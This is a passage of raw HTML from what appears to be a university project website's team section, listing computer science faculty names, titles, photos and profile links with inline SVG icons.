11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  